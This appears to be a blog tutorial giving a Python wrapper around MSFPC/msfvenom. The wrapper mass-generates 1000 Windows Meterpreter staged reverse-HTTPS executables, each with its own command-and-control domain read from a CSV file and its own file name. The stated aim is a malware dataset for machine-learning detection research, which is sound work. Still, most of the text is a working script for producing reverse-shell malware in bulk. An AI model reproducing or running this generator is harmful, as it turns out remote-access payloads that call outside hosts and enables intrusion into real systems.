Objective: Generation of 1000 Metasploit payloads each with a unique C&C domain name and binary name.
Purpose: Creation of malware dataset for Machine Learning
Background: Previously I used MSFVenom Payload Creator (MSFPC) for quickly generating payloads. MSFPC is a wrapper class on top of MSFVenom. MSFPC is insufficient to meet my objective, thus I had to write a wrapper class on top of MSFPC.
*So this is a wrapper on top of a wrapper. Technically MSFPC is redundant.
Overview:
1) On a Kali Linux VM
2) Update Metasploit
apt update
apt install metasploit-framework
3) Install MSFPC
apt install -y msfpc
4) Open gedit and copy the Python script below

import os
import socket
import subprocess

import pandas as pd

# Read the domain names to use (column 0: domain, column 1: binary name)
print("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print("Loaded domain name file")
print("")

correctmsg = "Done"
errmsg = "bignum too big to convert"
startfrom = 2

for index, row in df.iterrows():
    # Skip rows that were already processed in an earlier run
    if startfrom > index:
        print("skip: " + str(row[1]))
        continue
    attempt = 1
    # Check that the domain resolves; fall back to a default IP if it does not
    try:
        addr = socket.gethostbyname(row[0])
        print(addr)
    except socket.error as serr:
        if serr.errno == -2:
            print("Domain: " + row[0] + " is unresolvable, using default IP value instead.")
            row[0] = "127.0.0.1"
    command = "windows " + row[0] + " https"
    binaryname = str(row[1]) + ".exe"
    print(command)
    # set i to any positive number to start the loop
    i = 9999
    x = -1
    while x == -1:
        proc = subprocess.Popen(['msfpc', command], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # communicate() returns bytes; decode before searching for the status strings
        tmp = proc.communicate()[0].decode(errors="replace")
        # x == -1 means correctmsg was not found, i.e. crafting did not finish
        x = tmp.find(correctmsg)
        # i != -1 means the known msfvenom error message was found
        i = tmp.find(errmsg)
        if i != -1:
            print("retrying error crafting payload...: attempting " + str(attempt) + " times")
            attempt = attempt + 1
        if x == -1:
            print("error: " + tmp)
            attempt = attempt + 1
    print("Command: msfpc " + command + " is successful.")
    print("Saving as :" + binaryname)
    # Rename without a shell so a CSV value cannot be interpreted as shell syntax
    os.rename('./windows-meterpreter-staged-reverse-https-443.exe', './' + binaryname)
    print("Saved")
    print("")

5) Create a CSV file using Excel with the following format and save it as website.csv:
6) Execute the Python script (*internet is needed as msfvenom will validate the LHOST domain name)
7) About 40mins for 100 binaries, 900 to go =)